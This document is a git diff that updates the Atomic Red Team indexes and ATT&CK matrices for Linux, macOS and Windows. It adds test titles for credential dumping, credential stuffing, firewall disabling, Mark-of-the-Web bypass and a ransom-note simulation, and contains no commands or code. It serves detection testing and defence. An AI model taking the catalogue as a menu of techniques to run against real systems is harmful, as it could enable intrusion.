- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -603,6 +612,7 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
+ - Atomic Test #14: whois file download [linux, macos]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index 215f549a..90552709 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -4,7 +4,8 @@
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+ - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
@@ -202,7 +203,8 @@
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+ - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
@@ -454,6 +456,7 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
+ - Atomic Test #14: whois file download [linux, macos]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 5b6382dc..12ae449e 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -12,6 +12,8 @@
- Atomic Test #4: Access unattend.xml [windows]
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+ - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+ - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
@@ -359,10 +361,11 @@
- Atomic Test #4: Clear Windows Audit Policy Config [windows]
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #2: Disable Microsoft Defender Firewall [windows]
- - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
- - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
+ - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
+ - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
+ - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
+ - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
+ - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #10: Unload Sysmon Filter Driver [windows]
- Atomic Test #11: Uninstall Sysmon [windows]
@@ -407,7 +410,7 @@
- Atomic Test #1: Hidden Window [windows]
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- - Atomic Test #2: Create a user called "$" as noted here [windows]
+ - Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -439,7 +442,9 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
+ - Atomic Test #1: Mount ISO image [windows]
+ - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
@@ -765,7 +770,8 @@
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
-- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
+ - Atomic Test #5: PureLocker Ransom Note [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1044,7 +1050,8 @@
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+ - Atomic Test #1: Radmin Viewer Utility [windows]
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
@@ -1111,7 +1118,8 @@
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+ - Atomic Test #1: Radmin Viewer Utility [windows]
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 420df707..453f1a9f 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -1,16 +1,16 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -26,7 +26,7 @@
| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
@@ -45,7 +45,7 @@
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Systemd Service](../../T1543.002/T1543.002.md) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Systemd Timers](../../T1053.006/T1053.006.md) | | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md
index b4352dce..1c1dc3c9 100644
--- a/atomics/Indexes/Matrices/macos-matrix.md
+++ b/atomics/Indexes/Matrices/macos-matrix.md
@@ -4,7 +4,7 @@
